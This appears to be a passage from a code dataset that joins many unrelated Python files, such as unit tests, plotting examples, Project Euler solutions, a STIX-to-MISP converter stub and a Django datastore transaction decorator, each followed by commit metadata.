settings.updateSetting("showVacancies", True)
settings.updateSetting("findClusters", False)
settings.updateSetting("neighbourRadius", 3.5)
settings.updateSetting("minClusterSize", 3)
settings.updateSetting("maxClusterSize", -1)
settings.updateSetting("calculateVolumes", False)
settings.updateSetting("calculateVolumesVoro", True)
settings.updateSetting("calculateVolumesHull", False)
settings.updateSetting("identifySplitInts", True)
settings.updateSetting("useAcna", False)
settings.updateSetting("acnaMaxBondDistance", 5.0)
settings.updateSetting("acnaStructureType", 1)
settings.updateSetting("filterSpecies", False)
settings.updateSetting("visibleSpeciesList", [])
# filter input
filterInput = self.makeFilterInput()
# call filter
result = self.filter.apply(filterInput, settings)
self.assertIsInstance(result, base.FilterResult)
# check result
self.assertEqual(len(filterInput.vacancies), 1)
self.assertEqual(filterInput.vacancies[0], 0)
self.assertEqual(len(filterInput.interstitials), 0)
self.assertEqual(len(filterInput.antisites), 1)
self.assertEqual(filterInput.antisites[0], 30)
self.assertEqual(len(filterInput.onAntisites), 1)
self.assertEqual(filterInput.onAntisites[0], 30)
self.assertEqual(len(filterInput.splitInterstitials), 3)
self.assertEqual(filterInput.splitInterstitials[0], 4)
splits = filterInput.splitInterstitials
self.assertTrue(splits[1] == 0 or splits[1] == 4)
s2 = 0 if splits[1] == 4 else 0
self.assertEqual(splits[2], s2)
### SPLIT INTS OFF ###
# update settings
settings.updateSetting("identifySplitInts", False)
# filter input
filterInput = self.makeFilterInput()
# call filter
result = self.filter.apply(filterInput, settings)
self.assertIsInstance(result, base.FilterResult)
# check result
self.assertEqual(len(filterInput.vacancies), 2)
vacs = filterInput.vacancies
self.assertTrue(vacs[0] == 0 or vacs[0] == 4)
v2 = 0 if vacs[0] == 4 else 4
self.assertEqual(vacs[1], v2)
self.assertEqual(len(filterInput.interstitials), 2)
ints = filterInput.interstitials
self.assertTrue(ints[0] == 0 or ints[0] == 4)
i2 = 0 if ints[0] == 4 else 4
self.assertEqual(ints[1], i2)
self.assertEqual(len(filterInput.antisites), 1)
self.assertEqual(filterInput.antisites[0], 30)
self.assertEqual(len(filterInput.onAntisites), 1)
self.assertEqual(filterInput.onAntisites[0], 30)
self.assertEqual(len(filterInput.splitInterstitials), 0)
| Python | 0 | |
f0392ebda49fa0222a3b317f50002d7e03659f47 | Test we can approve Flutterwave bank accounts | bluebottle/funding_flutterwave/tests/test_states.py | bluebottle/funding_flutterwave/tests/test_states.py | from bluebottle.files.tests.factories import PrivateDocumentFactory
from bluebottle.funding.tests.factories import FundingFactory, PlainPayoutAccountFactory, \
BudgetLineFactory
from bluebottle.funding_flutterwave.tests.factories import FlutterwaveBankAccountFactory
from bluebottle.test.utils import BluebottleTestCase
from bluebottle.initiatives.tests.factories import InitiativeFactory
class FlutterwavePayoutAccountTestCase(BluebottleTestCase):
def setUp(self):
self.initiative = InitiativeFactory.create(status='approved')
self.funding = FundingFactory.create(initiative=self.initiative)
self.document = PrivateDocumentFactory.create()
self.payout_account = PlainPayoutAccountFactory.create(document=self.document)
self.bank_account = FlutterwaveBankAccountFactory.create(connect_account=self.payout_account)
self.funding.bank_account = self.bank_account
self.funding.save()
BudgetLineFactory.create(activity=self.funding)
def test_approve_bank_account(self):
self.bank_account.states.verify(save=True)
self.bank_account.refresh_from_db()
self.assertEqual(self.bank_account.status, 'verified')
self.payout_account.refresh_from_db()
self.assertEqual(self.payout_account.status, 'verified')
self.funding.refresh_from_db()
self.assertEqual(self.funding.status, 'submitted')
| Python | 0 | |
9c3449cdfa7b39069b691b31ff75defa7cf9b302 | add example.py | doc/example.py | doc/example.py | import numpy as np
import os
import metaseq
ip_filename = metaseq.helpers.example_filename(
'wgEncodeHaibTfbsK562Atf3V0416101AlnRep1_chr17.bam')
input_filename = metaseq.helpers.example_filename(
'wgEncodeHaibTfbsK562RxlchV0416101AlnRep1_chr17.bam')
ip_signal = metaseq.genomic_signal(ip_filename, 'bam')
input_signal = metaseq.genomic_signal(input_filename, 'bam')
# If you already have TSSs, skip this part.
import gffutils
db = gffutils.FeatureDB(
metaseq.example_filename('Homo_sapiens.GRCh37.66_chr17.gtf.db'))
import pybedtools
from pybedtools.featurefuncs import TSS
from gffutils.helpers import asinterval
def tss_generator():
for transcript in db.features_of_type('transcript'):
yield TSS(asinterval(transcript), upstream=1000, downstream=1000)
if not os.path.exists('tsses.gtf'):
tsses = pybedtools.BedTool(tss_generator()).saveas('tsses.gtf')
tsses = pybedtools.BedTool('tsses.gtf')
from metaseq import persistence
if not os.path.exists('example.npz'):
ip_array = ip_signal.array(tsses, bins=100, processes=8)
input_array = input_signal.array(tsses, bins=100, processes=8)
ip_array /= ip_signal.mapped_read_count() / 1e6
input_array /= input_signal.mapped_read_count() / 1e6
persistence.save_features_and_arrays(
features=tsses,
arrays={'ip': ip_array, 'input': input_array},
prefix='example',
link_features=True,
overwrite=True)
features, arrays = persistence.load_features_and_arrays(prefix='example')
normalized = arrays['ip'] - arrays['input']
ind = metaseq.plotutils.tip_zscores(normalized)
fig = metaseq.plotutils.imshow(
normalized,
vmin=5,
vmax=99.,
percentile=True,
sort_by=ind,
imshow_kwargs=dict(interpolation='bilinear'),
line_kwargs=dict(color='k'),
fill_kwargs=dict(color='k', alpha=0.4),
x=np.linspace(-1000, 1000, 100),
height_ratios=(2, 1, 1)
)
fig.array_axes.xaxis.set_visible(False)
fig.array_axes.set_ylabel('Transcripts on chr17')
fig.array_axes.axvline(0, color='k', linestyle='--')
fig.line_axes.set_xlabel('Distance from TSS')
fig.line_axes.axvline(0, color='k', linestyle='--')
from matplotlib import pyplot as plt
import matplotlib
d = metaseq.results_table.ResultsTable(
metaseq.example_filename('GSM847566_SL2592.table'),
import_kwargs=dict(index_col=0))
d = d.reindex_to(features, attribute='transcript_id')
import pandas
labels = pandas.qcut(d.fpkm, 4).labels
ulabels = sorted(list(set(labels)))
colors = matplotlib.cm.YlOrBr((np.array(ulabels) + 2) / 5.)
bottom_axes = plt.subplot(fig.gs[2, 0])
for q, color in zip(ulabels, colors):
ind = labels == q
print q, color
metaseq.plotutils.ci_plot(
np.linspace(-1000, 1000, 100),
normalized[ind, :],
ax=bottom_axes,
line_kwargs=dict(color=color, label=q),
fill_kwargs=dict(color=color, alpha=0.5),
)
fig.line_axes.xaxis.set_visible(False)
bottom_axes.set_xlabel('Distance from TSS')
bottom_axes.legend(loc='best', fontsize=10)
fig.array_axes.set_ylabel('Transcripts')
fig.cax.set_ylabel('Enrichment')
fig.subplots_adjust(left=0.2)
bottom_axes.set_ylabel('Enrichment')
fig.line_axes.set_ylabel('Enrichment')
plt.show()
| Python | 0.000002 | |
c1fc0121b02656de7bc99c587743485b5e45e416 | Create angelbambi.py | angelbambi.py | angelbambi.py | #the following lines will allow you to use buttons and leds
import btnlib as btn
import ledlib as led
import time
#the led.startup() function cycles through the leds
led.startup()
time.sleep(1)
print("All on and off")
#to turn on all leds, use the led.turn_on_all(2) function:
led.turn_on_all()
time.sleep(2)
#to turn off all:
led.turn_off_all()
time.sleep(1)
print("Red on and off")
#to turn on a single led, use a command like this:
led.turn_on(led.red)
#your choices for leds are led.red, led.yellow, led.green, led.blue
time.sleep(2)
#to turn it off:
led.turn_off(led.red)
time.sleep(1)
print("Yellow with isOn test")
#the led.isOn(led) function tells you if a particular led is currently on
if led.isOn(led.yellow):
print("Yellow is on")
else :
print("Yellow is on")
time.sleep(3)
led.turn_on(led.yellow)
if led.isOn(led.yellow):
print("Yellow is on")
else :
print("Yellow is off")
time.sleep(6)
led.turn_off(led.yellow)
time.sleep(41)
print("Green and blue switch")
#the led.switch(led) function knows whether an led is on or off and switches its value
led.turn_on(led.green)
time.sleep(3)
led.switch(led.green)
led.switch(led.blue)
time.sleep(2.2)
led.switch(led.blue)
time.sleep(1.4)
print("If switch is on, press yellow for yellow and red for red")
#the btn.isOn(btn) function tells you if a particular button is being pressed or if a switch is on
#your choices for buttons are currently btn.red, btn.yellow, btn.switch
while btn.isOn(btn.switch) :
if btn.isOn(btn.yellow):
led.switch(led.purple)
if btn.isOn(btn.red) :
led.switch(led.blue)
time.sleep(0.25) #this line keeps it from querying too fast and mistaking a long press for multiple presses
print("Goodbye")
btn.GPIO.cleanup()
| Python | 0.002066 | |
d3f46aba674f6fb402702ad803938c3401bfd0dd | Refactor of stix2misp - only a beginning atm | app/files/scripts/stix_to_misp.py | app/files/scripts/stix_to_misp.py | # -*- coding: utf-8 -*-
# Copyright (C) 2017-2018 CIRCL Computer Incident Response Center Luxembourg (smile gie)
# Copyright (C) 2017-2018 Christian Studer
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, json, os, time
import pymisp
from stix.core import STIXPackage
descFilename = os.path.join(pymisp.__path__[0], 'data/describeTypes.json')
with open(descFilename, 'r') as f:
categories = json.loads(f.read())['result'].get('categories')
class StixParser():
def __init__(self):
self.misp_event = pymisp.MISPEvent()
def loadEvent(self, args, pathname):
try:
filename = '{}/tmp/{}'.format(pathname, args[1])
try:
with open(filename, 'r') as f:
self.event = json.loads(f.read())
self.isJson = True
except:
event = STIXPackage.from_xml(filename)
if args[1].startswith('misp.'):
fromMISP = True
else:
fromMISP = False
self.isJson = False
if fromMISP:
self.event = event.related_packages.related_package[0].item.incidents[0]
else:
self.event = event
self.fromMISP = fromMISP
except:
print(json.dumps({'success': 0, 'message': 'The temporary STIX export file could not be read'}))
sys.exit(0)
def handler(self, args):
if self.isJson:
self.namefile = args[1]
else:
self.namefile = '{}.json'.format(args[1])
if self.fromMISP:
self.buildMispDict()
else:
self.buildExternalDict()
def buildMispDict(self):
self.dictTimestampAndDate()
self.eventInfo()
for indicator in self.event.related_indicators.indicator:
self.parse_misp_indicator(indicator)
def buildExternalDict(self):
self.dictTimestampAndDate()
self.eventInfo()
def dictTimestampAndDate(self):
stixTimestamp = self.event.timestamp
try:
date = stixTimestamp.split("T")[0]
except AttributeError:
date = stixTimestamp
self.misp_event.date = date
self.misp_event.timestamp = self.getTimestampfromDate(stixTimestamp)
def getTimestampfromDate(self, date):
try:
try:
dt = date.split('+')[0]
d = int(time.mktime(time.strptime(dt, "%Y-%m-%dT%H:%M:%S")))
except:
dt = date.split('.')[0]
d = int(time.mktime(time.strptime(dt, "%Y-%m-%dT%H:%M:%S")))
except AttributeError:
d = int(time.mktime(date.timetuple()))
return d
def eventInfo(self):
try:
try:
info = self.event.stix_header.title
except:
info = self.event.title
if info:
self.misp_event.info = info
else:
raise Exception("Imported from external STIX event")
except Exception as noinfo:
self.misp_event.info = noinfo
def parse_misp_indicator(self, indicator):
if indicator.relationship in categories:
self.parse_misp_attribute(indicator)
else:
self.parse_misp_object(indicator)
def parse_misp_attribute(self, indicator):
misp_attribute = pymisp.MISPAttribute()
misp_attribute.category = indicator.relationship
properties = indicator.item.observable
def parse_misp_object(self, indicator):
name = str(indicator.relationship)
if name in ['file']:
misp_object = pymisp.MISPObject(name)
def main(args):
pathname = os.path.dirname(args[0])
stix_parser = StixParser()
stix_parser.loadEvent(args, pathname)
stix_parser.handler(args)
print(stix_parser.misp_event)
if __name__ == "__main__":
main(sys.argv)
| Python | 0 | |
0135ce760bb3bf8f2fd828fdb195bcdc4e4c3117 | Add sample.py | sample.py | sample.py | from traitscli import TraitsCLIBase
from traits.api import Bool, Float, Int, Str, Enum, Event
class SampleCLI(TraitsCLIBase):
"""Sample CLI using `traitscli`."""
not_configurable_from_cli = Bool
yes = Bool(config=True)
fnum = Float(config=True)
inum = Int(config=True)
string = Str(config=True)
choice = Enum(['a', 'b', 'c'], config=True)
def do_run(self):
names = self.class_trait_names(
# Avoid 'trait_added' and 'trait_modified'
# (See also `HasTraits.traits`):
trait_type=lambda t: not isinstance(t, Event))
width = max(map(len, names))
for na in names:
print "{0:{1}} : {2!r}".format(na, width, getattr(self, na))
if __name__ == '__main__':
SampleCLI.cli()
| Python | 0.000001 | |
1706531082d75f7d6522b4f7d409df8d4fb2b3d7 | Create __init__.py | plantcv/plantcv/visualize/eCDF/__init__.py | plantcv/plantcv/visualize/eCDF/__init__.py | from plantcv.plantcv.visualize.eCDF.obj_size import obj_size
__all__ = ["obj_size"]
| Python | 0.000429 | |
4d4120d6982a02a01b8dd2a4853eab47d7fe6f83 | Create tests.py | polls/tests.py | polls/tests.py | import datetime
from django.utils import timezone
from django.test import TestCase
from .models import Question
# Create your tests here.
class QuestionMethodTests(TestCase):
def test_was_published_recently_with_future_question(self):
"""
was_published_recently() should return False for questions whose
pub_date is in the future.
"""
time = timezone.now() + datetime.timedelta(days=30)
future_question = Question(pub_date=time)
self.assertEqual(future_question.was_published_recently(), False)
def test_was_published_recently_with_old_question(self):
"""
was_published_recently() should return False for question whose
pub_date is older than 1 day.
"""
time = timezone.now() - datetime.timedelta(days=30)
old_question = Question(pub_date=time)
self.assertEqual(old_question.was_published_recently(), False)
def test_was_published_recently_with_recent_question(self):
"""
was_published_recently() should return True for question whose
pub_date is within the last day.
"""
time = timezone.now() - datetime.timedelta(hours=1)
recent_question = Question(pub_date=time)
self.assertEqual(recent_question.was_published_recently(), True)
| Python | 0.000001 | |
84e52f3aa2679c0dd709a2cb794b3426541060d4 | add cftt/feature/feature.py new file: cftt/feature/feature.py | cftt/feature/feature.py | cftt/feature/feature.py | # -*- coding: utf-8 -*-
import sys
import os
import json
import collections
from shapely.geometry.point import BaseGeometry
from shapely.geometry import shape, mapping
from shapely.ops import cascaded_union
import util
class Feature(object):
"""単一の feature を扱うためのクラス
"""
def __init__(self, data):
"""feature を構成する
:param data: 'geometry' と 'properties' を属性に持った Mapping オブジェクト
"""
self.load(data)
def load(self, data):
"""data を元に feature を構成する
:param data: 'geometry' と 'properties' を属性に持った Mapping オブジェクト
"""
if isinstance(data, Feature):
self.geometry = data.geometry
self.properties = data.properties
self.attributes = data.attributes
else:
self.geometry = data['geometry']
self.properties = data['properties']
self.attributes = {
k: v for k, v in data.items()
if k not in set(('geometry', 'properties', 'type'))
}
return self
def dump(self):
"""このインスタンスを表す、json.dumpsなどでダンプ可能なオブジェクトを返す
"""
return dict({u'type': u'Feature',
u'geometry': util.rec_decode(mapping(self._geometry)),
u'properties': self._properties}, **self._attributes)
@property
def properties(self):
"""このインスタンスの properties オブジェクト自体を返す
"""
return self._properties
@properties.setter
def properties(self, x):
"""このインスタンスの properties を設定する
:param x: Mapping オブジェクト
"""
if not util.is_map(x):
raise Exception('properties must be an instance of Mapping')
self._properties = util.rec_decode(x)
return self
@property
def geometry(self):
"""このインスタンスの geometry オブジェクト自体を返す
"""
return self._geometry
@geometry.setter
def geometry(self, x):
"""このインスタンの geometry を設定する
:param x: shape か shape に変換可能な Mapping オブジェクト
"""
if isinstance(x, BaseGeometry):
self._geometry = x
elif util.is_map(x):
self._geometry = shape(x)
else:
raise Exception('geometry must be an instance of shape')
return self
@property
def attributes(self):
"""このインスタンスのその他の属性の Mapping オブジェクトを返す
"""
return self._attributes
@attributes.setter
def attributes(self, x):
"""このインスタンスのその他の属性を設定する
:param x: Mapping オブジェクト
"""
if not util.is_map(x):
raise Exception('attributes must be an instance of Mapping')
self._attributes = util.rec_decode(x)
return self
def property(self, *x):
"""properties を set/get する。
property('id') id 属性の値を取得する
property('id', 'a123') id 属性の値を a123 に設定する
:param x: 単一の値、list, dict, set, tupleまたはキーとヴァリューのペア
"""
if len(x) == 0:
return self
if len(x) == 1:
if util.is_map(x[0]):
for k, v in util.rec_decode(x[0]).items():
self.property(k, v)
return self
if isinstance(x[0], collections.Set):
return {k: self.property(k) for k in util.rec_decode(x[0])}
if util.is_array(x[0]):
return util.cons_array(
(self.property(k) for k in util.rec_decode(x[0])),
x[0].__class__, tuple)
k = util.safe_decode(x[0])
if not util.is_string(x[0]):
k = unicode(x[0])
if k in self._properties:
return self._properties[k]
return None
k = util.safe_decode(x[0])
if not util.is_string(x[0]):
k = unicode(x[0])
v = util.rec_decode(x[1])
if v is None:
if k in self._properties:
del self._properties[k]
return self
self._properties[k] = v
return self
def attr(self, *x):
"""attributes を set/get する。
attr('id') id 属性の値を取得する
attr('id', 'a123') id 属性の値を a123 に設定する
:param x: 単一の値、list, dict, set, tupleまたはキーとヴァリューのペア
"""
if len(x) == 0:
return self
if len(x) == 1:
if util.is_map(x[0]):
for k, v in util.rec_decode(x[0]).items():
self.attr(k, v)
return self
if isinstance(x[0], collections.Set):
return {k: self.attr(k) for k in util.rec_decode(x[0])}
if util.is_array(x[0]):
return util.cons_array(
(self.attr(k) for k in util.rec_decode(x[0])),
x[0].__class__, tuple)
k = util.safe_decode(x[0])
if not util.is_string(x[0]):
k = unicode(x[0])
if k in self._attributes:
return self._attributes[k]
return None
k = util.safe_decode(x[0])
if not util.is_string(x[0]):
k = unicode(x[0])
v = util.rec_decode(x[1])
if v is None:
if k in self._attributes:
del self._attributes[k]
return self
self._attributes[k] = v
return self
| Python | 0.000001 | |
15aa7efa3dfdade3001cdb6b5ac4c2f3c5cc2461 | Test Commit | raspberry/asip/RelationSemanticTag.py | raspberry/asip/RelationSemanticTag.py | from SemanticTag import *
#Test | Python | 0.000001 | |
95c34b9ad7ca6c425853642353a2d56282cc94d1 | add script | plugins/Scripts/Plugins/Convert_To_8bit.py | plugins/Scripts/Plugins/Convert_To_8bit.py | # @DatasetIOService ds
# @ConvertService convert
# @UIService ui
import os
from ij import IJ
from ij import ImagePlus
d = "/home/hadim/Insync/Data/Microscopy/PSF/2016.04.12.T1/raw"
files = os.listdir(d)
for fname in files:
fpath = os.path.join(d, fname)
print(fpath)
print(fpath)
dataset = ds.open(fpath)
ui.show(dataset)
imp = convert.convert(dataset, ImagePlus)
IJ.run("8-bit")
ds.save(dataset, fpath) # DOES NOT WORK
| Python | 0.000001 | |
0b058198539195b5520687c744b5cd1eebae3d18 | predict all files in dir | predict_dir.py | predict_dir.py | import argparse
import os
from predict import main
def run_dir(in_path, out_path):
for item in os.listdir(in_path):
if item.endswith('.wav'):
out_file_path = out_path + item.replace('.wav', '.TextGrid')
main(in_path + item, out_file_path)
if __name__ == "__main__":
# the first argument is the wav file path
# the second argument is the TextGrid path
# -------------MENU-------------- #
# command line arguments
parser = argparse.ArgumentParser()
parser.add_argument("in_dir", help="The input directory")
parser.add_argument("out_dir", help="The output directory")
args = parser.parse_args()
# main function
run_dir(args.in_dir, args.out_dir)
| Python | 0.998316 | |
8cdbda5c0694f4137c1b8a92bafd7f33a6a84d78 | solve pep_751 | pe-solution/src/main/python/pep_751.py | pe-solution/src/main/python/pep_751.py | from typing import Tuple
from decimal import Decimal, ROUND_FLOOR
def b_a(b: Decimal) -> Tuple[Decimal, Decimal]:
a = b.to_integral_exact(ROUND_FLOOR)
b = a * (b % 1 + 1)
return a, b
def th_tau(th: Decimal, n: int) -> Decimal:
a1, b = b_a(th)
l = []
for _ in range(2, n + 1):
a, b = b_a(b)
l.append(a)
return Decimal(f"{a1}." + "".join(map(str, l)))
def solve():
n_max = 15
tau = 2
for n in range(2, n_max + 1):
k = Decimal(10) ** (-n + 1)
for th in [tau + k * x for x in range(0, 10)]:
if (tau := th_tau(th, n)) < th:
break
return f"{tau:.24f}"
if __name__ == "__main__":
theta = Decimal("2.956938891377988")
tau = Decimal("2.3581321345589")
assert th_tau(theta, 9) == tau
print(solve())
| Python | 0.999969 | |
0428d4889b34568a5b5397532dfd0091029b64de | Create problem-10.py | problem-10.py | problem-10.py | import math
def is_prime(next):
if n == 2:
return True
if n == 3:
return True
if n % 2 == 0:
return False
if n % 3 == 0:
return False
i = 5
w = 2
while math.pow(i, 2) <= n:
if n % i == 0:
return False
i += w
w = 6 - w
return True
s = 0
max = 2000000
for n in range(2, max-1):
if is_prime(n):
s += n
print(s)
| Python | 0.00049 | |
4fe4cad49367b462c2201b98cce4382bff3a0206 | Add a script which use the iterative parsing to process the map file and find out not only what tags are there, but also how many, to get the feeling on how much of which data you can expect to have in the map. | DataWrangling/CaseStudy/mapparser.py | DataWrangling/CaseStudy/mapparser.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Your task is to use the iterative parsing to process the map file and
find out not only what tags are there, but also how many, to get the
feeling on how much of which data you can expect to have in the map.
Fill out the count_tags function. It should return a dictionary with the
tag name as the key and number of times this tag can be encountered in
the map as value.
Note that your code will be tested with a different data file than the 'example.osm'
"""
import xml.etree.cElementTree as ET
import pprint
import os
def count_tags(filename):
# YOUR CODE HERE
tags = {}
for event, elem in ET.iterparse(filename):
if elem.tag in tags:
tags[elem.tag] += 1
else:
tags[elem.tag] = 1
return tags
def test():
os.chdir('./data')
tags = count_tags('example.osm')
pprint.pprint(tags)
assert tags == {'bounds': 1,
'member': 3,
'nd': 4,
'node': 20,
'osm': 1,
'relation': 1,
'tag': 7,
'way': 1}
if __name__ == "__main__":
test() | Python | 0 | |
3d18f6e3ba3519422aa30bd25f3511f62361d5ca | Add test to ensure no mutable default arguments | tests/chainer_tests/test_chainer_objects.py | tests/chainer_tests/test_chainer_objects.py | import importlib
import inspect
import pkgutil
import types
import six
import unittest
import chainer
from chainer import testing
def walk_modules():
root = chainer.__path__
for loader, modname, ispkg in pkgutil.walk_packages(root, 'chainer.'):
# Skip modules generated by protobuf.
if '_pb2' in modname:
continue
try:
mod = importlib.import_module(modname)
except ImportError:
continue
yield mod
def get_classes(module):
# Enumerate classes from a module
for name, o in module.__dict__.items():
if (inspect.isclass(o)
and o.__module__.startswith('chainer.')):
yield o
def get_functions(module):
# Enumerate functions from a module
# Normal functions
for k, o in module.__dict__.items():
if (isinstance(o, types.FunctionType)
and o.__module__.startswith('chainer.')):
yield o
# Methods defined in a class
for cls in get_classes(module):
if cls.__module__.startswith('chainer.'):
for k, o in cls.__dict__.items():
if inspect.isfunction(o):
yield o
def get_default_arguments(func):
# Retrieves the defaults arguments (names and values) of a function.
if six.PY2:
# Python 2
spec = inspect.getargspec(func)
if spec.defaults is not None:
n = len(spec.defaults)
for name, default_value in zip(spec.args[-n:], spec.defaults):
yield name, default_value
else:
# Python 3
signature = inspect.signature(func)
for name, param in signature.parameters.items():
if param.default is not inspect.Parameter.empty:
yield name, param.default
class TestFunctions(unittest.TestCase):
def test_no_mutable_default_args(self):
type_blacklist = (list, dict)
badlist = []
# Collect mutable default arguments
for mod in walk_modules():
for func in get_functions(mod):
for arg_name, value in get_default_arguments(func):
if isinstance(value, type_blacklist):
badlist.append((func, arg_name, type(value)))
if len(badlist) > 0:
# Report the error
s = six.StringIO()
s.write(
'Some functions have mutable values as default values:\n\n')
for func, arg_name, value_type in badlist:
s.write('{}.{}: arg=\'{}\' type={}\n'.format(
func.__module__, func.__name__, arg_name, value_type))
assert False, s.getvalue()
testing.run_module(__name__, __file__)
| Python | 0 | |
fcb07c7cd94f96cd533c55d18a657673f9eeac7f | Move log related functions over to this file | SpicyTwitch/Log_tools.py | SpicyTwitch/Log_tools.py | # Imports-----------------------------------------------------------------------
import logging
import os
from inspect import stack, getmodulename
from . import Storage
# Base setup--------------------------------------------------------------------
log_to_stdout = True
log_to_file = True
logging_level = logging.DEBUG # TODO: Change this back to INFO!
log_format = '[%(asctime)s] [%(levelname)s] [%(module)s] (%(funcName)s): ' \
'%(message)s'
date_format = '%Y/%m/%d %I:%M:%S %p'
log_formatter = logging.Formatter(log_format, datefmt=date_format)
console_handler = logging.StreamHandler()
console_handler.setFormatter(log_formatter)
log_storage = os.path.join(Storage.primary_storage_directory, 'logs')
if not os.path.exists(log_storage):
os.mkdir(log_storage)
# Functions---------------------------------------------------------------------
def get_module_name() -> str:
return getmodulename(stack()[2][1])
def create_logger() -> logging.Logger:
python_module = get_module_name()
module_logger = logging.getLogger(python_module)
if log_to_stdout:
module_logger.addHandler(console_handler)
if log_to_file:
file_path = os.path.join(log_storage, python_module + '.log')
file_handler = logging.FileHandler(file_path)
file_handler.setFormatter(log_formatter)
module_logger.addHandler(file_handler)
module_logger.setLevel(logging_level)
return module_logger
| Python | 0 | |
7ec36d0a1d0a757d0c914e4857ae06f4fece88f8 | Add HexTerrain | problem/pop_map/hexagon/hex_terrain.py | problem/pop_map/hexagon/hex_terrain.py | #! /usr/bin/env python
# Copyright 2020 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
"""Implements a "flat" hex grid, using invaluable advice from Amit Patel
https://www.redblobgames.com/grids/hexagons
"""
# We choose flat-top rather than pointy-top hexes,
# with odd-q vertical layout. # , and doubleheight.
# We adopt Amit's "origin at upper left" convention,
# which implies that angles resemble compass angles,
# with small positive angles in quadrant IV rather than I.
from enum import Enum, auto
import numpy as np
class Direction(Enum):
# (col, row) deltas
SE = (1, 0)
SOUTH = (0, 1)
SW = (-1, 0)
NW = (-1, -1)
NORTH = (0, -1)
NE = (1, -1)
class CellContent(Enum):
# breadcrumbs for a traversed path:
MARKED_SE = auto()
MARKED_SOUTH = auto()
MARKED_SW = auto()
MARKED_NW = auto()
MARKED_NORTH = auto()
MARKED_NE = auto()
UNMARKED = auto() # like Path in a maze
CITY = auto() # a goal cell
MOUNTAIN = auto() # impassable, like Wall in a maz
class HexTerrain:
''
if __name__ == '__main__':
HexTerrain()
| Python | 0.000012 | |
4061e5db7097a680405282e371ab3bf07758648a | Add simple unit tests to validate all configs | projects/DensePose/tests/test_setup.py | projects/DensePose/tests/test_setup.py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import os
import unittest
from detectron2.config import get_cfg
from detectron2.engine import default_setup
from densepose import add_densepose_config
_CONFIG_DIR = "configs"
_QUICK_SCHEDULES_CONFIG_SUB_DIR = "quick_schedules"
_CONFIG_FILE_PREFIX = "densepose_"
_CONFIG_FILE_EXT = ".yaml"
def _get_config_dir():
return os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", _CONFIG_DIR)
def _collect_config_files(config_dir):
paths = []
for entry in os.listdir(config_dir):
_, ext = os.path.splitext(entry)
if ext != _CONFIG_FILE_EXT:
continue
if not entry.startswith(_CONFIG_FILE_PREFIX):
continue
path = os.path.join(config_dir, entry)
paths.append(path)
return paths
def _get_config_files():
config_dir = _get_config_dir()
return _collect_config_files(config_dir)
def _get_quick_schedules_config_files():
config_dir = _get_config_dir()
config_dir = os.path.join(config_dir, _QUICK_SCHEDULES_CONFIG_SUB_DIR)
return _collect_config_files(config_dir)
class TestSetup(unittest.TestCase):
def _test_setup(self, config_file):
cfg = get_cfg()
add_densepose_config(cfg)
cfg.merge_from_file(config_file)
cfg.freeze()
default_setup(cfg, {})
def test_setup_configs(self):
config_files = _get_config_files()
for config_file in config_files:
self._test_setup(config_file)
def test_setup_quick_schedules_configs(self):
config_files = _get_quick_schedules_config_files()
for config_file in config_files:
self._test_setup(config_file)
| Python | 0.000001 | |
d1bc6c3fd5741c5c8d3d6dd2ee5c5c28c2764ba3 | add Tumblr.py | TumblrResource/Tumblr.py | TumblrResource/Tumblr.py | #!/usr/bin/env python
# coding:utf-8
| Python | 0 | |
2d73440f76faab151745ebf5a7a92aaec21cb491 | Write a more reliable transaction decorator | djangae/db/transaction.py | djangae/db/transaction.py | from google.appengine.api.datastore import (
CreateTransactionOptions,
_GetConnection,
_PushConnection,
_PopConnection,
_SetConnection,
IsInTransaction
)
from google.appengine.datastore.datastore_rpc import TransactionOptions
from djangae.db.backends.appengine import caching
class ContextDecorator(object):
def __init__(self, func=None):
self.func = func
def __call__(self, *args, **kwargs):
def decorated(*_args, **_kwargs):
with self:
return self.func(*_args, **_kwargs)
if not self.func:
self.func = args[0]
return decorated
return decorated(*args, **kwargs)
class TransactionFailedError(Exception):
pass
class AtomicDecorator(ContextDecorator):
def __init__(self, func=None, xg=False, independent=False):
self.independent = independent
self.xg = xg
self.conn_stack = []
super(AtomicDecorator, self).__init__(func)
def _do_enter(self, independent, xg):
# Clear the context cache at the start of a transaction
caching.clear_context_cache()
if IsInTransaction():
if independent:
self.conn_stack.append(_PopConnection())
try:
return self._do_enter(independent, xg)
except:
_PushConnection(self.conn_stack.pop())
raise
options = CreateTransactionOptions(
xg=xg,
propagation=TransactionOptions.INDEPENDENT if independent else None
)
conn = _GetConnection()
_PushConnection(None)
_SetConnection(conn.new_transaction(options))
def _do_exit(self, independent, xg, exception):
try:
if exception:
_GetConnection().rollback()
else:
if not _GetConnection().commit():
raise TransactionFailedError()
finally:
_PopConnection()
if independent:
while self.conn_stack:
_PushConnection(self.conn_stack.pop())
# Clear the context cache at the end of a transaction
caching.clear_context_cache()
def __enter__(self):
self._do_enter(self.independent, self.xg)
def __exit__(self, exc_type, exc_value, traceback):
self._do_exit(self.independent, self.xg, exc_type)
atomic = AtomicDecorator
commit_on_success = AtomicDecorator # Alias to the old Django name for this kinda thing
| from google.appengine.api.datastore import (
CreateTransactionOptions,
_GetConnection,
_PushConnection,
_PopConnection,
_SetConnection,
IsInTransaction
)
from google.appengine.datastore.datastore_rpc import TransactionOptions
from djangae.db.backends.appengine import caching
class AtomicDecorator(object):
